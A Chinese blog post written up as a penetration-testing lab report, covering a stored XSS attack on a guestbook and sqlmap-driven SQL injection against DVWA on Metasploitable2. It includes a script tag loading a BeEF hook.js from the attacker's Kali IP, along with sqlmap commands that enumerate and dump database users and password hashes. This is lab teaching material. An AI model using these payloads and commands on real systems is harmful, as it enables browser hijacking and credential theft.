渗透实验 XSS和SQL注入(Lab3.0)

  • 开发
  • 39

windows server2003IIS搭建

配置2003的虚拟机
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

在这里插入图片描述

2、 Kali使用beef生成恶意代码

cd /usr/share/beef-xss

./beef

执行上面两条命令
在这里插入图片描述
账户是beef
密码是之前自己设置好的
hook.js里面有自带的恶意代码
在这里插入图片描述

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板

<script src="http://Kali的IP地址:3000/hook.js"></script>

在这里插入图片描述
在这里插入图片描述

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置。

在这里插入图片描述
左边就是别人的IP
右边就是可以控制浏览器的转跳,这里我跳的是百度

5、回答问题:实验中XSS攻击属于哪种类型?

存储型
XSS

SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建

打开Metasploitable2后,里面有搭建好的DVWA,访问http://Metasploitable的IP/dvwa (可能需要先扫描一下内网的ip,确定Metasploitable2的ip地址)并且把安全等级设置为最低
在这里插入图片描述

此时可以断定有SQL注入漏洞

http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

2、枚举当前使用的数据库名称和用户名。

sqlmap语法参数
-u:指定目标URL
--cookie:当前会话的cookies值
-b:获取数据库类型,检查数据库管理系统标识
--current-db:获取当前数据库
--current-user:获取当前数据库使用的用户
--string:当查询可用时用来匹配页面中的字符串
--users:枚举DBMS用户
-password:枚举DBMS用户密码hash

sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -b --current-db --current-user

注意你cookie,还有你的文件路径是否一样
在这里插入图片描述

3、枚举数据库用户名和密码

sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' --users --password

在这里插入图片描述

4、枚举数据库

–dbs:枚举当前数据库

sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' --dbs

在这里插入图片描述

5、枚举数据库和指定数据库的数据表

-D 数据库名:指定数据库
–tables:枚举指定数据库的所有表

sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -D "dvwa" --tables

在这里插入图片描述

6、获取指定数据库和表中所有列的信息

-D:指定的数据库
-T:指定数据库中的数据表
–columns:获取列的信息

sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -D "dvwa" -T users --columns

在这里插入图片描述

7、枚举指定数据表中的所有用户名与密码,并down到本地。

-C:枚举数据表中的列

–dump:存储sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -D "dvwa" -T users -C “user_id,user,password” --dump

在这里插入图片描述

阅读全部

相关推荐

  6. Spring-Cloud-Gateway-实现XSSSQL注入拦截

    2023-12-24 22:44:01       9 阅读

最近更新

  4. TCP协议是安全的吗?

    2023-12-24 22:44:01       19 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-24 22:44:01       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2023-12-24 22:44:01       20 阅读

  18. 通过文章id递归查询所有评论(xml)

    2023-12-24 22:44:01       20 阅读

热门阅读

  1. ROBOGUIDE教程:FANUC机器人固定点焊焊接虚拟仿真

    2023-12-24 22:44:01       50 阅读

  3. Flink电商实时数仓(四)

    2023-12-24 22:44:01       40 阅读

  13. 数据迁移测试经验分享

    2023-12-24 22:44:01       35 阅读

  20. 【Android 13】使用Android Studio调试系统应用之Settings移植(三):构建settingsLib项目目录

    2023-12-24 22:44:01       37 阅读

  21. Python基础(持续更新)

    2023-12-24 22:44:01       28 阅读

  25. 接口功能测试策略

    2023-12-24 22:44:01       37 阅读

  26. 经常使用的排序算法

    2023-12-24 22:44:01       38 阅读

  28. 企业数据治理(2):“数据治理体系建设“

    2023-12-24 22:44:01       32 阅读